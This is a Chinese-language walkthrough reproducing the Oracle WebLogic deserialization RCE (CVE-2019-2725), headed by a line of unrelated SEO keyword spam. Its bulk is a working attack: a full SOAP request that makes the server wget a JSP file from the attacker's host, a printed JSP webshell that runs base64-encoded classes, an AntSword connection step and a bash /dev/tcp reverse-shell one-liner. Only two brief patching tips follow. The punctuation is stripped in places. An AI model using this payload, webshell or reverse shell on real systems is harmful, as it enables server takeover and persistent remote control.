网站设置的流程第一步应该,188旅游网站管理系统6.0模板,什么网站可以做项目,中国站长网入口漏洞描述#xff1a;
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞#xff0c;这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞#xff0c;通过针对Oracle官网历年来的补丁构造payload来绕过。
复现过程#xff1a;
1.访问ip#xff1a;port 2.可…
漏洞描述
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞通过针对Oracle官网历年来的补丁构造payload来绕过。
复现过程
1.访问ipport 2.可以访问
/_async/AsyncResponseService
则存在漏洞
3.查看网站路径
/_async/AsyncResponseService?info 4.开启http服务
5.将GET改为POST随后请求包部分除了第一行第二行保留其他全部替换如下payload POST /_async/AsyncResponseService HTTP/1.1 Host: ip:port Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,image/apng,*/*;q0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9,en;q0.8 Connection: close Content-Length: 841 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml soapenv:Envelope xmlns:soapenvhttp://schemas.xmlsoap.org/soap/envelope/ xmlns:wsahttp://www.w3.org/2005/08/addressing xmlns:asyhttp://www.bea.com/async/AsyncResponseService soapenv:Header wsa:Actionxx/wsa:Action wsa:RelatesToxx/wsa:RelatesTo work:WorkContext xmlns:workhttp://bea.com/2004/06/soap/workarea/ void classjava.lang.ProcessBuilder array classjava.lang.String length3 void index0 string/bin/bash/string /void void index1 string-c/string /void void index2 stringwget http://ip:port/jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp/string /void /array void methodstart//void /work:WorkContext /soapenv:Header soapenv:Body asy:onAsyncDelivery/ /soapenv:Body/soapenv:Envelope 6.使用payload上传jsp木马 Jsp源码密码123456 %! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { try { Class clazz Class.forName(sun.misc.BASE64Decoder); return (byte[]) clazz.getMethod(decodeBuffer, String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz Class.forName(java.util.Base64); Object decoder clazz.getMethod(getDecoder).invoke(null); return (byte[]) decoder.getClass().getMethod(decode, String.class).invoke(decoder, str); } } % % String cls request.getParameter(123456); if (cls ! null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } % 7.访问上传木马
8.蚁剑连接
9.反弹shell
9.1payload
bash -i /dev/tcp/target ip/target port 01
这里需要转换否则无法利用
例
bash -i /dev/tcp/ip/9999 01
9.2本机监听
修复建议
1.升级本地JDK环境
2.及时安装官方补丁